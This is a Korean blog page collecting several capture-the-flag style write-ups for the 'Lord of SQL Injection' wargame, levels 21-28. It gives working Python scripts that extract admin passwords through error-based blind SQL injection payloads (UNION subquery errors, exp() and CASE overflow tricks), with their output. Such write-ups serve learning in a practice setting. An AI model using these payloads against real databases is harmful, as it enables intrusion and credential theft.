'error based sql injection' 태그의 글 목록

error based sql injection

[LOSI] Lord of SQL Injection Level 28 - Frankenstein 2021.04.23
[LOSI] Lord of SQL Injection Level 24 - Evil Wizard 2021.04.21
[LOSI] Lord of SQL Injection Level 23 - Hell Fire 2021.04.21
[LOSI] Lord of SQL Injection Level 22 - Dark Eyes 2021.04.20
[LOSI] Lord of SQL Injection Level 21 - Iron Golem 2021.04.20

[LOSI] Lord of SQL Injection Level 28 - Frankenstein

리덕토 2021. 4. 23. 04:50

2021. 4. 23. 04:50

프랑켄슈타인! 드디어 이미지를 구할 수 있는 몬스터를 만났다. 이번 문제도 우리의 지식 선상에서 컷 가능하다. 바로 코드를 만나보도록 하자

<출처 : 위키백과 https://en.wikipedia.org/wiki/Frankenstein>

코드

첫번째 query는 유니온과 괄호를 막는다. 여러 가지 이유가 있겠지만 필자가 생각하기엔 ERROR Based SQL Injection을 막으려는 거 같다. >> 아마 저번 시간에 쓴 if와 서브 쿼리는 사용하기 어려워 보인다.

두 번째 query는 pw에 addslash 하고 admin에 대한 정확한 pw를 물어보는 조건문이 붙는다. 즉 Blind SQL Injection이다.

해결방법

Answer Url : los.rubiya.kr/chall/XXXX.php?pw=0dc4efbb

from requests import get
import string


url = "### Frenkenstein URL ###"
cookie = dict(PHPSESSID="### 자신의 PHPSESSID ###")
password = ''
letters = string.ascii_letters+string.digits
break_flag = False

print("### find for pw ###") 
while(True) :
    if(break_flag) :
    	break
    for a in letters :
        param = "?pw=1' or case when id='admin' and pw like '"+password+a+"%' then 9e307*2 else 0 end-- ;"
        new_url = url+param
        rec = get(new_url,cookies=cookie)

        if(rec.text.find("login_chk")<0) :
            password += a
            print("password ",password)
            break
        if(letters[-1] == a) :
            break_flag = True

print("here's your passwrod : "+password)

SQL 조건문에는 CASE라는 조건문이 있다. 다음과 같이

이를 이용하면 문제조건에 부합하게 괄호를 사용하지 않고 조건문을 작성할 수 있다. 에러는 간단한 오버플로우 에러를 활용하였다.

* 9e307은 에러를 발생시키지 않는 최대의 정수 값이다. 이 이후로는 오버플로우 에러가 발생한다.

출력은 다음과 같다.

### find for pw ###
password  0
password  0d
password  0dc
password  0dc4
password  0dc4e
password  0dc4ef
password  0dc4efb
password  0dc4efbb
here's your passwrod : 0dc4efbb

문제풀이를 자축하자

CASE문에 대해서 공부할 수 있는 좋은 시간이었다. 여러분과 필자는 다음 몬스터에서 만나겠다.

'WarGame > Lord of SQL Injection' 카테고리의 다른 글

[LOSI] Lord of SQL Injection Level 30 - Ouroboros (0)	2021.04.23
[LOSI] Lord of SQL Injection Level 29 - Phantom (0)	2021.04.23
[LOSI] Lord of SQL Injection Level 27 - Blue Dragon (0)	2021.04.23
[LOSI] Lord of SQL Injection Level 26 - Red Dragon (0)	2021.04.22
[LOSI] Lord of SQL Injection Level 25 - Green Dragon (0)	2021.04.22

[LOSI] Lord of SQL Injection Level 24 - Evil Wizard

리덕토 2021. 4. 21. 23:29

2021. 4. 21. 23:29

벌써 24번째 몬스터인 아주 사악한 마법사를 마주쳤다. 점점 난이도가 올라만 가는 느낌이 드는데 너무 두려워말고 코드를 먼저 보도록 해보자

<출처 : 나무위키 : https://namu.wiki/w/%EB%B3%BC%EB%93%9C%EB%AA%A8%ED%8A%B8 >

코드

무엇보다 주석은 두려워할 필요가 있다. 이번 문제도 order by뒤에 전달할 파라미터 order를 설정할 수는 있지만, hell fire때와 같지 않을 거라고 이야기한다.

또한 저번 시간 time base sql injection을 사용해서 hell fire를 파훼한 사람에게는 아쉽지만 sleep과 benchmark는 금지되었다.

해결방법

Answer Url : los.rubiya.kr/chall/XXXX.php?order=1&email=aasup3r_secure_email@emai1.com

from requests import get
import string

url = "### evil wizrd의 URL ###"
cookie = dict(PHPSESSID="### 자신의 PHPSESSID ###")
length = 0
password = ''
letters = string.ascii_letters + string.digits + string.punctuation


print("### find for pw length ###")
while(True) :
    param = "?order=(select exp(710) where "+str(length)+"=(select length(email) where id='admin'))"
    new_url = url+param
    rec = get(new_url,cookies=cookie)
    if(rec.text.find("rubiya805")<0) :
        print("find pw length : "+str(length))
        break
    else :
        print("PLease... : "+str(length))
        length+=1


print("### find for pw ###") 
for i in range(1,length+1) :
    temp_array = ''
    for a in letters :
        param = "?order=(select exp(710) where '"+str(ord(a))+"'=ASCII((select substr(email,"+str(i)+",1) where id='admin')))"
        new_url = url+param
        rec = get(new_url,cookies=cookie)

        if(rec.text.find("rubiya805")<0) :
            password += a
            print("total password",password)
            break
        

print("here's your passwrod : "+password)

어.... 필자는 기회가 되면 hell fire의 풀이법을 time based SQL Injection으로 고치고 오겠다.

* 풀이는 완전히 동일하다. *
* 역시 주석은 무서워할 필요가 없다. *

출력은 다음과 같다.

### find for pw length ###
PLease... : 0
PLease... : 1
PLease... : 2

...

PLease... : 29
find pw length : 30
### find for pw ###
total password a
total password aa
total password aas

...

total password aasup3r_secure_email@emai1.com
here's your passwrod : aasup3r_secure_email@emai1.com

에이씨 이럴줄 알았으면 저번에 Time Based SQL Injection으로 풀어볼걸

'WarGame > Lord of SQL Injection' 카테고리의 다른 글

[LOSI] Lord of SQL Injection Level 26 - Red Dragon (0)	2021.04.22
[LOSI] Lord of SQL Injection Level 25 - Green Dragon (0)	2021.04.22
[LOSI] Lord of SQL Injection Level 23 - Hell Fire (0)	2021.04.21
[LOSI] Lord of SQL Injection Level 22 - Dark Eyes (0)	2021.04.20
[LOSI] Lord of SQL Injection Level 21 - Iron Golem (0)	2021.04.20

[LOSI] Lord of SQL Injection Level 23 - Hell Fire

리덕토 2021. 4. 21. 23:17

2021. 4. 21. 23:17

< 출처 : YES24 도서 : http://www.yes24.com/Product/Goods/32468559 >

이제 하다 하다 지옥의 불까지 몬스터로 나왔다. 어이가 없다. 바로 코드로 만나 보도록 하자. 이번에는 dark Eyes에서 이용했던 Error Based SQL Injection을 조금 깊게 이용한다.

코드

이번에 우리 ERROR BASED SQL Injection의 친구인 UNION이 금지당했다. 다른 방법의 ERROR 발생이 필요하다.

* 이 문제를 푸는 방법은 두가지 중 하나를 추천한다. sleep을 이용한 Time Based SQL Injection이나, exp() 함수를 이용한 Error 발생

해결방법

Answer Url : los.rubiya.kr/chall/XXXX.php?order=1&email=admin_secure_email@emai1.com

from requests import get
import string

url = "### HELL FIRE의 URL ###"
cookie = dict(PHPSESSID="### 자신의 PHPSESSID ###")
length = 0
password = ''
letters = string.ascii_letters + string.digits + string.punctuation


print("### find for pw length ###")
while(True) :
    param = "?order=(select exp(710) where "+str(length)+"=(select length(email) where id='admin'))"
    new_url = url+param
    rec = get(new_url,cookies=cookie)
    if(rec.text.find("rubiya805")<0) :
        print("find pw length : "+str(length))
        break
    else :
        print("PLease... : "+str(length))
        length+=1


print("### find for pw ###") 
for i in range(1,length+1) :
    temp_array = ''
    for a in letters :
        param = "?order=(select exp(710) where '"+str(ord(a))+"'=ASCII((select substr(email,"+str(i)+",1) where id='admin')))"
        new_url = url+param
        rec = get(new_url,cookies=cookie)

        if(rec.text.find("rubiya805")<0) :
            password += a
            print("total password",password)
            break
        

print("here's your passwrod : "+password)

코드는 exp()함수의 에러 발생을 이용하였다. 첫 번째 무한루프 문의 쿼리는 exp(710)이 오버플로를 일으킨다는 것을 이용해서 결과가 참이면 검색 후 문자열(rubiya805 >> 검색 성공 시 표시되는 id 'rubiya'의 email이다.)이 나오지 않으면 성공으로 조건을 지정하였다.(이번에는 에러가 나오면 성공이다.)

* exp(parameter)는 자연로그의 및 e의 parameter제곱값을 반환한다. 이게 보통 709를 넘어가면 표현이 오버플로우되어 에러가 발생한다.

두 번째 루프에서는 검색된 length(email)인 28을 기준으로 substr과 ascii를 이용해서 검색을 하고 있다. string.punctuation까지 사용한 이유는 email이 "@"를 포함한 특수문자를 포함하기 때문이다. 이는 처음에 "@"만 타깃으로 삼았는데, 의외로 email자체에 특수문자"_"가 있었더라.

출력은 다음과 같다. 반복되는 출력은 ...으로 생략한다.

### find for pw length ###
PLease... : 0
PLease... : 1
PLease... : 2

...

PLease... : 27
find pw length : 28
### find for pw ###
total password a
total password ad
total password adm

...

here's your passwrod : admin_secure_email@emai1.com

축하한다.

이로써 Hell Fire를 무찌르며 우리의 Error Based SQL Injection의 수준이 한 단계 올라갔다. 필자는 다음 몬스터에서 여러분들을 기다리겠다.( Hell Fire부터는 필자로 새로 푸는 거라 포스팅 속도가 느릴 수도 있다. 양해 바란다.)

'WarGame > Lord of SQL Injection' 카테고리의 다른 글

[LOSI] Lord of SQL Injection Level 25 - Green Dragon (0)	2021.04.22
[LOSI] Lord of SQL Injection Level 24 - Evil Wizard (0)	2021.04.21
[LOSI] Lord of SQL Injection Level 22 - Dark Eyes (0)	2021.04.20
[LOSI] Lord of SQL Injection Level 21 - Iron Golem (0)	2021.04.20
[LOSI] Lord of SQL Injection Level 20 - dragon (0)	2021.04.17

[LOSI] Lord of SQL Injection Level 22 - Dark Eyes

리덕토 2021. 4. 20. 01:13

2021. 4. 20. 01:13

으흠; Dark Eyes를 찾으려고 구글을 검색했는데, 진짜 눈알밖에 없다.(이게 진짜 공포 아닐까) 이번에는 사진 없이 바로 코드로 만나보자

* 본 포스팅의 해결방법은 Python으로 작성되어있습니다. 코드의 상세한 해석은 아래를 참조 *

2021.04.13 - [WarGame/Lord of SQL Injection] - [LOSI] Lord of SQL Injection Level 4 - Orc

[LOSI] Lord of SQL Injection Level 4 - Orc

무서운 몬스터가 우리 앞을 막아섰다. 오크라고 불리는 이 몬스터는.... 심각하게 뚱뚱한 이 몬스터를 쉽게 이길수 없다는 생각이 든다. 일단 코드를 확인하자. * 주의 : 이번 포스팅은 Python을 기

tutoreducto.tistory.com

코드

정확한 pw를 물어보니 역시 blind SQL Injectino을 특히 error based SQL Injection을 이용한 문제풀이이다. 필터링된 문자열로 when, if, case, 등 조건식이 금지된 것을 보니, 이번엔 조건문으로 에러를 발생시키지는 못하겠다. 우회방법을 알아보자

* 특히나 이번에는 ERROR의 결과도 웹페이지에 안 띄운다...

해결방법

Answer Url : los.rubiya.kr/chall/XXXX.php?pw=5a2f5d3c

from requests import get

url = "### Dark EYES의 URL ###"
cookie = dict(PHPSESSID="### 자신의 PHPSESSID ###")
length = 0
password = ''

print("### find for pw length ###")
while(True) :
    param = "?pw=%27%20or%20id=%27admin%27%20and%20(select%201%20union%20select(length(pw)="+str(length)+"))--%20"
    new_url = url+param
    rec = get(new_url,cookies=cookie)
    if(rec.text!="") :
        print("find pw length : "+str(length))
        break
    else :
        print("PLease... : "+str(length))
        length+=1

print("### find for pw ###") 
for i in range(1,length+1) :
    temp_array = ''
    for j in range(1,9) :
        param = "?pw=%27%20or%20id=%27admin%27%20and%20(select 1 union select(substr(lpad(bin(ord(substr(pw,"+str(i)+",1))),8,0),"+str(j)+",1)=1))--%20"
        new_url = url+param
        rec = get(new_url,cookies=cookie)

        if(rec.text!="") :
            temp_array += "1"
        else :
            temp_array += "0"
    password += chr(int(temp_array,base=2))

print("here's your passwrod : "+password)

그렇다. 당연하게도 그냥 서브쿼리를 합쳐서 에러를 발생시킬 수 있다.(만약 두 번째 select가 동작을 안 했으면 >> 거짓이라면 FALSE의 반환으로 Subquery의 반환 row는 1개가 되어(1) 에러가 없을 것이다.)

### find for pw length ###
PLease... : 0
PLease... : 1
PLease... : 2
PLease... : 3
PLease... : 4
PLease... : 5
PLease... : 6
PLease... : 7
find pw length : 8
### find for pw ###
here's your passwrod : 5a2f5d3c

출력은 위와같다.

축하한다. 이로써 ERROR Based SQL Injection의 이해가 깊어졌을 것이라고 생각한다. 다음 관문에서 여러분들을 기다리겠다.

'WarGame > Lord of SQL Injection' 카테고리의 다른 글

[LOSI] Lord of SQL Injection Level 24 - Evil Wizard (0)	2021.04.21
[LOSI] Lord of SQL Injection Level 23 - Hell Fire (0)	2021.04.21
[LOSI] Lord of SQL Injection Level 21 - Iron Golem (0)	2021.04.20
[LOSI] Lord of SQL Injection Level 20 - dragon (0)	2021.04.17
[LOSI] Lord of SQL Injection Level 19 - xavis (0)	2021.04.17

[LOSI] Lord of SQL Injection Level 21 - Iron Golem

리덕토 2021. 4. 20. 00:43

2021. 4. 20. 00:43

철 골렘이다. 글이 날아가서 썩 기분이 좋은 몬스터가 아니니, 빠르게 코드를 만나보자

<출처 : 마인크래프트 위키 https://minecraft.fandom.com/wiki/Iron_Golem>

* 본 포스팅의 문제 해결 코드는 Python으로 작성되어있습니다. 코드의 자세한 설명은 아래 참조 *

2021.04.13 - [WarGame/Lord of SQL Injection] - [LOSI] Lord of SQL Injection Level 4 - Orc

[LOSI] Lord of SQL Injection Level 4 - Orc

tutoreducto.tistory.com

코드

우선 Blind SQL Injection을 사용해야 된다.(정확한 Pw를 물어본다.) 특이한 건 첫 번째 query에서 성공 여부를 판단할 수 있는 방법이 error를 통해서라는 점이다.(참고로 이런 식으로 blind sql injection을 하는 것을 error based sql injection이라고 한다.)

필터링된 문자열은 sleep과 benchmark인데, 이는 둘다 time base sql injection에 사용되는 함수이다.(select * from table sleep(2) >> 성공하면 2초 기다렸다가 결과가 반환된다. 실패하면 바로 반환되는 점을 이용한 blind sql injection이다.)

이번엔 다른 방식으로 접근해봐야 되겠다.

해결방법

Answer Url : los.rubiya.kr/chall/XXXX.php?pw=06b5a6c16e8830475f983cc3a825ee9a

from requests import get


url = "### IRON GOLEM URL ###"
cookie = dict(PHPSESSID="### 자신의 PHPSESSID ###")
length = 0
password = ''

print("### find for pw length ###")
while(True) :
    param = "?pw=%27%20or%20id=%27admin%27%20and%20if(length(pw)="+str(length)+",FALSE,(select%201%20union%20select%202))--%20;"
    new_url = url+param
    rec = get(new_url,cookies=cookie)

    if(rec.text.find("Subquery returns more than 1 row")<0) :
        print("find pw length : "+str(length))
        break
    else :
        print("PLease.... : "+str(length))
        length+=1
 
print("### find for pw ###") 
for i in range(1,length+1) :
    temp_array = ''
    for j in range(1,9) :
        param = "?pw=%27%20or%20id=%27admin%27%20and%20(select 1 union select(substr(lpad(bin(ord(substr(pw,"+str(i)+",1))),8,0),"+str(j)+",1)=1))--%20;"
        new_url = url+param
        rec = get(new_url,cookies=cookie)

        if(rec.text.find("Subquery returns more than 1 row")<0) :
            temp_array += "1"
        else :
            temp_array += "0"

    password += chr(int(temp_array,base=2))

print("here's your passwrod : "+password)

에러를 강제로 일으키는 좋은 방법 중 하나는 UNION을 사용하는 것이다. 위에처럼 SELECT 1 UNION SELECT 2를 하게 되면 2개의 row를 가진 서브 쿼리 결과가 만들어지는데, 이는 문법 위반이다.(조건식의 서브 쿼리는 1개의 row만을 가져야 한다.)

따라서 if문을 이용해서 length(pw)의 길이를 하나하나 늘려가며, 틀렸을 경우 error를 발생시키고(에러가 나오면 웹페이지에 Subquery returns more than 1 row가 나온다.) 아니면 찾을 걸로 처리하면 된다. 실행결과는 다음과 같다.

### find for pw length ###
PLease.... : 0
PLease.... : 1
PLease.... : 2
PLease.... : 3
PLease.... : 4
PLease.... : 5
PLease.... : 6
PLease.... : 7
PLease.... : 8
PLease.... : 9
PLease.... : 10
PLease.... : 11
PLease.... : 12
PLease.... : 13
PLease.... : 14
PLease.... : 15
PLease.... : 16
PLease.... : 17
PLease.... : 18
PLease.... : 19
PLease.... : 20
PLease.... : 21
PLease.... : 22
PLease.... : 23
PLease.... : 24
PLease.... : 25
PLease.... : 26
PLease.... : 27
PLease.... : 28
PLease.... : 29
PLease.... : 30
PLease.... : 31
find pw length : 32
### find for pw ###
here's your passwrod : 06b5a6c16e8830475f983cc3a825ee9a

이번 몬스터를 통해 Error based SQL Injection을 배웠다. 벌써 우리의 여정이 반이나 지나가고 있다. 다음 관문에서 여러분을 기다리겠다.

'WarGame > Lord of SQL Injection' 카테고리의 다른 글

[LOSI] Lord of SQL Injection Level 23 - Hell Fire (0)	2021.04.21
[LOSI] Lord of SQL Injection Level 22 - Dark Eyes (0)	2021.04.20
[LOSI] Lord of SQL Injection Level 20 - dragon (0)	2021.04.17
[LOSI] Lord of SQL Injection Level 19 - xavis (0)	2021.04.17
[LOSI] Lord of SQL Injection Level 18 - Nightmare (0)	2021.04.17

PREV 이전 1 NEXT 다음

TUTOR 리덕토의 배움세상